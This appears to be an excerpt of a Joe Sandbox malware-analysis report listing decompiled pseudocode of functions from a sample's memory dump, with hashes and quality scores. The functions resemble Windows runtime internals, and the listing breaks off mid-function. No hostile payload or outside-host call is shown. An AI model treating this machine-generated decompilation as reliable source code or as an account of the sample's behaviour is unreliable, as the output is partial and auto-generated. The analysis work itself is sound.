                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: deeb71ff9302858e680caf93afb6df65ea70bc93c3226ae34d093d9b04d4493c
                            • Instruction ID: e35f089c66c4dbaa1c46973ba6158671477f41a920b22a71519b4a8fd2063715
                            • Opcode Fuzzy Hash: deeb71ff9302858e680caf93afb6df65ea70bc93c3226ae34d093d9b04d4493c
                            • Instruction Fuzzy Hash: 25312332245345DFC761EF95CD89B2ABBA8FF85614F1804E9EA229B291C770D800CF85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 74%
                            			E037FE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                            				intOrPtr* _v0;
                            				signed char _v4;
                            				signed int _v8;
                            				void* __ecx;
                            				void* __ebp;
                            				void* _t37;
                            				intOrPtr _t38;
                            				signed int _t44;
                            				signed char _t52;
                            				void* _t54;
                            				intOrPtr* _t56;
                            				void* _t58;
                            				char* _t59;
                            				signed int _t62;
                            
                            				_t58 = __edx;
                            				_push(0);
                            				_push(4);
                            				_push( &_v8);
                            				_push(0x24);
                            				_push(0xffffffff);
                            				if(E03809670() < 0) {
                            					L0381DF30(_t54, _t58, _t35);
                            					asm("int3");
                            					asm("int3");
                            					asm("int3");
                            					asm("int3");
                            					asm("int3");
                            					asm("int3");
                            					_push(_t54);
                            					_t52 = _v4;
                            					if(_t52 > 8) {
                            						_t37 = 0xc0000078;
                            					} else {
                            						_t38 =  *0x38b7b9c; // 0x0
                            						_t62 = _t52 & 0x000000ff;
                            						_t59 = L037E4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                            						if(_t59 == 0) {
                            							_t37 = 0xc0000017;
                            						} else {
                            							_t56 = _v0;
                            							 *(_t59 + 1) = _t52;
                            							 *_t59 = 1;
                            							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                            							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                            							_t44 = _t62 - 1;
                            							if(_t44 <= 7) {
                            								switch( *((intOrPtr*)(_t44 * 4 +  &M037FE810))) {
                            									case 0:
                            										L6:
                            										 *((intOrPtr*)(_t59 + 8)) = _a8;
                            										goto L7;
                            									case 1:
                            										L13:
                            										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                            										goto L6;
                            									case 2:
                            										L12:
                            										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                            										goto L13;
                            									case 3:
                            										L11:
                            										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                            										goto L12;
                            									case 4:
                            										L10:
                            										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                            										goto L11;
                            									case 5:
                            										L9:
                            										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                            										goto L10;
                            									case 6:
                            										L17:
                            										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                            										goto L9;
                            									case 7:
                            										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                            										goto L17;
                            								}
                            							}
                            							L7:
                            							 *_a40 = _t59;
                            							_t37 = 0;
                            						}
                            					}
                            					return _t37;
                            				} else {
                            					_push(0x20);
                            					asm("ror eax, cl");
                            					return _a4 ^ _v8;
                            				}
                            			}


















                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8c6fbe12cd157a1f4305bec6d6697956a766e96a62e868d251462f9728a68241
                            • Instruction ID: 33fca430b8ceea7b07ab96920cb3a3d76eb7cc3e3fa59fa6da345d198dfbc98c
                            • Opcode Fuzzy Hash: 8c6fbe12cd157a1f4305bec6d6697956a766e96a62e868d251462f9728a68241
                            • Instruction Fuzzy Hash: 17318DB5A14249EFD744DF58C841B9AB7E8FB09310F14829AFA04CB751E631E980CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 67%
                            			E037FBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				void* __ebx;
                            				void* __edi;
                            				intOrPtr _t22;
                            				intOrPtr* _t41;
                            				intOrPtr _t51;
                            
                            				_t51 =  *0x38b6100; // 0x5
                            				_v12 = __edx;
                            				_v8 = __ecx;
                            				if(_t51 >= 0x800) {
                            					L12:
                            					return 0;
                            				} else {
                            					goto L1;
                            				}
                            				while(1) {
                            					L1:
                            					_t22 = _t51;
                            					asm("lock cmpxchg [ecx], edx");
                            					if(_t51 == _t22) {
                            						break;
                            					}
                            					_t51 = _t22;
                            					if(_t22 < 0x800) {
                            						continue;
                            					}
                            					goto L12;
                            				}
                            				E037E2280(0xd, 0x11b8f1a0);
                            				_t41 =  *0x38b60f8; // 0x0
                            				if(_t41 != 0) {
                            					 *0x38b60f8 =  *_t41;
                            					 *0x38b60fc =  *0x38b60fc + 0xffff;
                            				}
                            				E037DFFB0(_t41, 0x800, 0x11b8f1a0);
                            				if(_t41 != 0) {
                            					L6:
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                            					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                            					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                            					do {
                            						asm("lock xadd [0x38b60f0], ax");
                            						 *((short*)(_t41 + 0x34)) = 1;
                            					} while (1 == 0);
                            					goto L8;
                            				} else {
                            					_t41 = L037E4620(0x38b6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                            					if(_t41 == 0) {
                            						L11:
                            						asm("lock dec dword [0x38b6100]");
                            						L8:
                            						return _t41;
                            					}
                            					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                            					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                            					if(_t41 == 0) {
                            						goto L11;
                            					}
                            					goto L6;
                            				}
                            			}











                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: edf9e4f4ded6f0ae69ebc31941bf0b121e981106f97e9d926748c08d074e0a6e
                            • Instruction ID: c5886724d5fe6d8d8ce308dc89421d4cdfe1e3e05839abc9f21b4cd2f7e9d56c
                            • Opcode Fuzzy Hash: edf9e4f4ded6f0ae69ebc31941bf0b121e981106f97e9d926748c08d074e0a6e
                            • Instruction Fuzzy Hash: 9731AC36A00A169FCB11EF98D4807A673A8FF18311F0940B9EA45EB305FB74D90ACB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 76%
                            			E037C9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                            				signed int _t53;
                            				signed int _t56;
                            				signed int* _t60;
                            				signed int _t63;
                            				signed int _t66;
                            				signed int _t69;
                            				void* _t70;
                            				intOrPtr* _t72;
                            				void* _t78;
                            				void* _t79;
                            				signed int _t80;
                            				intOrPtr _t82;
                            				void* _t85;
                            				void* _t88;
                            				void* _t89;
                            
                            				_t84 = __esi;
                            				_t70 = __ecx;
                            				_t68 = __ebx;
                            				_push(0x2c);
                            				_push(0x389f6e8);
                            				E0381D0E8(__ebx, __edi, __esi);
                            				 *((char*)(_t85 - 0x1d)) = 0;
                            				_t82 =  *((intOrPtr*)(_t85 + 8));
                            				if(_t82 == 0) {
                            					L4:
                            					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                            						E038988F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                            					}
                            					L5:
                            					return E0381D130(_t68, _t82, _t84);
                            				}
                            				_t88 = _t82 -  *0x38b86c0; // 0x31d07b0
                            				if(_t88 == 0) {
                            					goto L4;
                            				}
                            				_t89 = _t82 -  *0x38b86b8; // 0x0
                            				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                            					goto L4;
                            				} else {
                            					E037E2280(_t82 + 0xe0, _t82 + 0xe0);
                            					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                            					__eflags =  *((char*)(_t82 + 0xe5));
                            					if(__eflags != 0) {
                            						E038988F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                            						goto L12;
                            					} else {
                            						__eflags =  *((char*)(_t82 + 0xe4));
                            						if( *((char*)(_t82 + 0xe4)) == 0) {
                            							 *((char*)(_t82 + 0xe4)) = 1;
                            							_push(_t82);
                            							_push( *((intOrPtr*)(_t82 + 0x24)));
                            							E0380AFD0();
                            						}
                            						while(1) {
                            							_t60 = _t82 + 8;
                            							 *(_t85 - 0x2c) = _t60;
                            							_t68 =  *_t60;
                            							_t80 = _t60[1];
                            							 *(_t85 - 0x28) = _t68;
                            							 *(_t85 - 0x24) = _t80;
                            							while(1) {
                            								L10:
                            								__eflags = _t80;
                            								if(_t80 == 0) {
                            									break;
                            								}
                            								_t84 = _t68;
                            								 *(_t85 - 0x30) = _t80;
                            								 *(_t85 - 0x24) = _t80 - 1;
                            								asm("lock cmpxchg8b [edi]");
                            								_t68 = _t84;
                            								 *(_t85 - 0x28) = _t68;
                            								 *(_t85 - 0x24) = _t80;
                            								__eflags = _t68 - _t84;
                            								_t82 =  *((intOrPtr*)(_t85 + 8));
                            								if(_t68 != _t84) {
                            									continue;
                            								}
                            								__eflags = _t80 -  *(_t85 - 0x30);
                            								if(_t80 !=  *(_t85 - 0x30)) {
                            									continue;
                            								}
                            								__eflags = _t80;
                            								if(_t80 == 0) {
                            									break;
                            								}
                            								_t63 = 0;
                            								 *(_t85 - 0x34) = 0;
                            								_t84 = 0;
                            								__eflags = 0;
                            								while(1) {
                            									 *(_t85 - 0x3c) = _t84;
                            									__eflags = _t84 - 3;
                            									if(_t84 >= 3) {
                            										break;
                            									}
                            									__eflags = _t63;
                            									if(_t63 != 0) {
                            										L40:
                            										_t84 =  *_t63;
                            										__eflags = _t84;
                            										if(_t84 != 0) {
                            											_t84 =  *(_t84 + 4);
                            											__eflags = _t84;
                            											if(_t84 != 0) {
                            												 *0x38bb1e0(_t63, _t82);
                            												 *_t84();
                            											}
                            										}
                            										do {
                            											_t60 = _t82 + 8;
                            											 *(_t85 - 0x2c) = _t60;
                            											_t68 =  *_t60;
                            											_t80 = _t60[1];
                            											 *(_t85 - 0x28) = _t68;
                            											 *(_t85 - 0x24) = _t80;
                            											goto L10;
                            										} while (_t63 == 0);
                            										goto L40;
                            									}
                            									_t69 = 0;
                            									__eflags = 0;
                            									while(1) {
                            										 *(_t85 - 0x38) = _t69;
                            										__eflags = _t69 -  *0x38b84c0;
                            										if(_t69 >=  *0x38b84c0) {
                            											break;
                            										}
                            										__eflags = _t63;
                            										if(_t63 != 0) {
                            											break;
                            										}
                            										_t66 = E03899063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                            										__eflags = _t66;
                            										if(_t66 == 0) {
                            											_t63 = 0;
                            											__eflags = 0;
                            										} else {
                            											_t63 = _t66 + 0xfffffff4;
                            										}
                            										 *(_t85 - 0x34) = _t63;
                            										_t69 = _t69 + 1;
                            									}
                            									_t84 = _t84 + 1;
                            								}
                            								__eflags = _t63;
                            							}
                            							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                            							 *((char*)(_t82 + 0xe5)) = 1;
                            							 *((char*)(_t85 - 0x1d)) = 1;
                            							L12:
                            							 *(_t85 - 4) = 0xfffffffe;
                            							E037C922A(_t82);
                            							_t53 = E037E7D50();
                            							__eflags = _t53;
                            							if(_t53 != 0) {
                            								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            							} else {
                            								_t56 = 0x7ffe0386;
                            							}
                            							__eflags =  *_t56;
                            							if( *_t56 != 0) {
                            								_t56 = E03898B58(_t82);
                            							}
                            							__eflags =  *((char*)(_t85 - 0x1d));
                            							if( *((char*)(_t85 - 0x1d)) != 0) {
                            								__eflags = _t82 -  *0x38b86c0; // 0x31d07b0
                            								if(__eflags != 0) {
                            									__eflags = _t82 -  *0x38b86b8; // 0x0
                            									if(__eflags == 0) {
                            										_t79 = 0x38b86bc;
                            										_t72 = 0x38b86b8;
                            										goto L18;
                            									}
                            									__eflags = _t56 | 0xffffffff;
                            									asm("lock xadd [edi], eax");
                            									if(__eflags == 0) {
                            										E037C9240(_t68, _t82, _t82, _t84, __eflags);
                            									}
                            								} else {
                            									_t79 = 0x38b86c4;
                            									_t72 = 0x38b86c0;
                            									L18:
                            									E037F9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                            								}
                            							}
                            							goto L5;
                            						}
                            					}
                            				}
                            			}



















                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 08a2c6bd1ae95a3fae5792b6604b9c1e816d8de33f1d1d818abb6494b1c5cd15
                            • Instruction ID: b0eeb13255b2df5593be1ac6f56a1dc9cfd2a8e120c051ef8a7819a922ff1013
                            • Opcode Fuzzy Hash: 08a2c6bd1ae95a3fae5792b6604b9c1e816d8de33f1d1d818abb6494b1c5cd15
                            • Instruction Fuzzy Hash: 9431D675A107C5DFDB65DBA8C4497ACFBB5BB4A310F1C81DDC604AB241D374A980CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 60%
                            			E037F1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                            				char _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				intOrPtr* _v20;
                            				void* _t22;
                            				char _t23;
                            				void* _t36;
                            				intOrPtr _t42;
                            				intOrPtr _t43;
                            
                            				_v12 = __ecx;
                            				_t43 = 0;
                            				_v20 = __edx;
                            				_t42 =  *__edx;
                            				 *__edx = 0;
                            				_v16 = _t42;
                            				_push( &_v8);
                            				_push(0);
                            				_push(0);
                            				_push(6);
                            				_push(0);
                            				_push(__ecx);
                            				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                            				_push(_t36);
                            				_t22 = E037EF460();
                            				if(_t22 < 0) {
                            					if(_t22 == 0xc0000023) {
                            						goto L1;
                            					}
                            					L3:
                            					return _t43;
                            				}
                            				L1:
                            				_t23 = _v8;
                            				if(_t23 != 0) {
                            					_t38 = _a4;
                            					if(_t23 >  *_a4) {
                            						_t42 = L037E4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                            						if(_t42 == 0) {
                            							goto L3;
                            						}
                            						_t23 = _v8;
                            					}
                            					_push( &_v8);
                            					_push(_t23);
                            					_push(_t42);
                            					_push(6);
                            					_push(_t43);
                            					_push(_v12);
                            					_push(_t36);
                            					if(E037EF460() < 0) {
                            						if(_t42 != 0 && _t42 != _v16) {
                            							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                            						}
                            						goto L3;
                            					}
                            					 *_v20 = _t42;
                            					 *_a4 = _v8;
                            				}
                            				_t43 = 1;
                            				goto L3;
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                            • Instruction ID: a3d11da2d51f8e7e93c1e6467899fcceca456b7d841b254065bb0d675f40da21
                            • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                            • Instruction Fuzzy Hash: 0521AE76A00218EFC721CF99CC84EABFBBDFF86655F554095EA019B310D630AE01DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 53%
                            			E037E0050(void* __ecx) {
                            				signed int _v8;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				intOrPtr* _t30;
                            				intOrPtr* _t31;
                            				signed int _t34;
                            				void* _t40;
                            				void* _t41;
                            				signed int _t44;
                            				intOrPtr _t47;
                            				signed int _t58;
                            				void* _t59;
                            				void* _t61;
                            				void* _t62;
                            				signed int _t64;
                            
                            				_push(__ecx);
                            				_v8 =  *0x38bd360 ^ _t64;
                            				_t61 = __ecx;
                            				_t2 = _t61 + 0x20; // 0x20
                            				E037F9ED0(_t2, 1, 0);
                            				_t52 =  *(_t61 + 0x8c);
                            				_t4 = _t61 + 0x8c; // 0x8c
                            				_t40 = _t4;
                            				do {
                            					_t44 = _t52;
                            					_t58 = _t52 & 0x00000001;
                            					_t24 = _t44;
                            					asm("lock cmpxchg [ebx], edx");
                            					_t52 = _t44;
                            				} while (_t52 != _t44);
                            				if(_t58 == 0) {
                            					L7:
                            					_pop(_t59);
                            					_pop(_t62);
                            					_pop(_t41);
                            					return E0380B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                            				}
                            				asm("lock xadd [esi], eax");
                            				_t47 =  *[fs:0x18];
                            				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                            				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                            				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                            				if(_t30 != 0) {
                            					if( *_t30 == 0) {
                            						goto L4;
                            					}
                            					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            					L5:
                            					if( *_t31 != 0) {
                            						_t18 = _t61 + 0x78; // 0x78
                            						E03898A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                            					}
                            					_t52 =  *(_t61 + 0x5c);
                            					_t11 = _t61 + 0x78; // 0x78
                            					_t34 = E037F9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                            					_t24 = _t34 | 0xffffffff;
                            					asm("lock xadd [esi], eax");
                            					if((_t34 | 0xffffffff) == 0) {
                            						 *0x38bb1e0(_t61);
                            						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                            					}
                            					goto L7;
                            				}
                            				L4:
                            				_t31 = 0x7ffe0386;
                            				goto L5;
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 74d6ed51e2e3bb83108be9866f8dd519e1341fa15deca6566bb86a20f6cf5ee5
                            • Instruction ID: 27a7aeb79f9260bac12132ffd7e48b128da6658d38ee6a7f214ccc9023414bb7
                            • Opcode Fuzzy Hash: 74d6ed51e2e3bb83108be9866f8dd519e1341fa15deca6566bb86a20f6cf5ee5
                            • Instruction Fuzzy Hash: 20318D35201B04CFD722CF29C844B9AB7E5FF89715F1845ADE596CBB90EB75A801CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 77%
                            			E03846C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                            				signed short* _v8;
                            				signed char _v12;
                            				void* _t22;
                            				signed char* _t23;
                            				intOrPtr _t24;
                            				signed short* _t44;
                            				void* _t47;
                            				signed char* _t56;
                            				signed char* _t58;
                            
                            				_t48 = __ecx;
                            				_push(__ecx);
                            				_push(__ecx);
                            				_t44 = __ecx;
                            				_v12 = __edx;
                            				_v8 = __ecx;
                            				_t22 = E037E7D50();
                            				_t58 = 0x7ffe0384;
                            				if(_t22 == 0) {
                            					_t23 = 0x7ffe0384;
                            				} else {
                            					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            				}
                            				if( *_t23 != 0) {
                            					_t24 =  *0x38b7b9c; // 0x0
                            					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                            					_t23 = L037E4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                            					_t56 = _t23;
                            					if(_t56 != 0) {
                            						_t56[0x24] = _a4;
                            						_t56[0x28] = _a8;
                            						_t56[6] = 0x1420;
                            						_t56[0x20] = _v12;
                            						_t14 =  &(_t56[0x2c]); // 0x2c
                            						E0380F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                            						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                            						if(E037E7D50() != 0) {
                            							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            						}
                            						_push(_t56);
                            						_push(_t47 - 0x20);
                            						_push(0x402);
                            						_push( *_t58 & 0x000000ff);
                            						E03809AE0();
                            						_t23 = L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                            					}
                            				}
                            				return _t23;
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8af739f1ba4672eb9bfc7b4019eec772a51ecd71b1c94e8e09130bb268fca874
                            • Instruction ID: e6d5e0d47cb63a96f2c05e243e76212be713e1cf5d326779c0a7bc24f4a695b1
                            • Opcode Fuzzy Hash: 8af739f1ba4672eb9bfc7b4019eec772a51ecd71b1c94e8e09130bb268fca874
                            • Instruction Fuzzy Hash: E8219F75A00648AFC715DFA8D844F6AB7B8FF49740F1440A9F904DBB91E634ED50CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 82%
                            			E038090AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                            				intOrPtr* _v0;
                            				void* _v8;
                            				signed int _v12;
                            				intOrPtr _v16;
                            				char _v36;
                            				void* _t38;
                            				intOrPtr _t41;
                            				void* _t44;
                            				signed int _t45;
                            				intOrPtr* _t49;
                            				signed int _t57;
                            				signed int _t58;
                            				intOrPtr* _t59;
                            				void* _t62;
                            				void* _t63;
                            				void* _t65;
                            				void* _t66;
                            				signed int _t69;
                            				intOrPtr* _t70;
                            				void* _t71;
                            				intOrPtr* _t72;
                            				intOrPtr* _t73;
                            				char _t74;
                            
                            				_t65 = __edx;
                            				_t57 = _a4;
                            				_t32 = __ecx;
                            				_v8 = __edx;
                            				_t3 = _t32 + 0x14c; // 0x14c
                            				_t70 = _t3;
                            				_v16 = __ecx;
                            				_t72 =  *_t70;
                            				while(_t72 != _t70) {
                            					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                            						L24:
                            						_t72 =  *_t72;
                            						continue;
                            					}
                            					_t30 = _t72 + 0x10; // 0x10
                            					if(E0381D4F0(_t30, _t65, _t57) == _t57) {
                            						return 0xb7;
                            					}
                            					_t65 = _v8;
                            					goto L24;
                            				}
                            				_t61 = _t57;
                            				_push( &_v12);
                            				_t66 = 0x10;
                            				if(E037FE5E0(_t57, _t66) < 0) {
                            					return 0x216;
                            				}
                            				_t73 = L037E4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                            				if(_t73 == 0) {
                            					_t38 = 0xe;
                            					return _t38;
                            				}
                            				_t9 = _t73 + 0x10; // 0x10
                            				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                            				E0380F3E0(_t9, _v8, _t57);
                            				_t41 =  *_t70;
                            				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                            					_t62 = 3;
                            					asm("int 0x29");
                            					_push(_t62);
                            					_push(_t57);
                            					_push(_t73);
                            					_push(_t70);
                            					_t71 = _t62;
                            					_t74 = 0;
                            					_v36 = 0;
                            					_t63 = E037FA2F0(_t62, _t71, 1, 6,  &_v36);
                            					if(_t63 == 0) {
                            						L20:
                            						_t44 = 0x57;
                            						return _t44;
                            					}
                            					_t45 = _v12;
                            					_t58 = 0x1c;
                            					if(_t45 < _t58) {
                            						goto L20;
                            					}
                            					_t69 = _t45 / _t58;
                            					if(_t69 == 0) {
                            						L19:
                            						return 0xe8;
                            					}
                            					_t59 = _v0;
                            					do {
                            						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                            							goto L18;
                            						}
                            						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                            						 *_t59 = _t49;
                            						if( *_t49 != 0x53445352) {
                            							goto L18;
                            						}
                            						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                            						return 0;
                            						L18:
                            						_t63 = _t63 + 0x1c;
                            						_t74 = _t74 + 1;
                            					} while (_t74 < _t69);
                            					goto L19;
                            				}
                            				 *_t73 = _t41;
                            				 *((intOrPtr*)(_t73 + 4)) = _t70;
                            				 *((intOrPtr*)(_t41 + 4)) = _t73;
                            				 *_t70 = _t73;
                            				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                            				return 0;
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                            • Instruction ID: 9b9142402b39705faa720484230ad565f0389c3b4fa5de64fb327989469e156e
                            • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                            • Instruction Fuzzy Hash: 5C219275A00308EFDB20DF99C844E6AF7F8EB48314F1488AAE949EB651D374ED44CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 59%
                            			E037F3B7A(void* __ecx) {
                            				signed int _v8;
                            				char _v12;
                            				intOrPtr _v20;
                            				intOrPtr _t17;
                            				intOrPtr _t26;
                            				void* _t35;
                            				void* _t38;
                            				void* _t41;
                            				intOrPtr _t44;
                            
                            				_t17 =  *0x38b84c4; // 0x0
                            				_v12 = 1;
                            				_v8 =  *0x38b84c0 * 0x4c;
                            				_t41 = __ecx;
                            				_t35 = L037E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x38b84c0 * 0x4c);
                            				if(_t35 == 0) {
                            					_t44 = 0xc0000017;
                            				} else {
                            					_push( &_v8);
                            					_push(_v8);
                            					_push(_t35);
                            					_push(4);
                            					_push( &_v12);
                            					_push(0x6b);
                            					_t44 = E0380AA90();
                            					_v20 = _t44;
                            					if(_t44 >= 0) {
                            						E0380FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x38b84c0 * 0xc);
                            						_t38 = _t35;
                            						if(_t35 < _v8 + _t35) {
                            							do {
                            								asm("movsd");
                            								asm("movsd");
                            								asm("movsd");
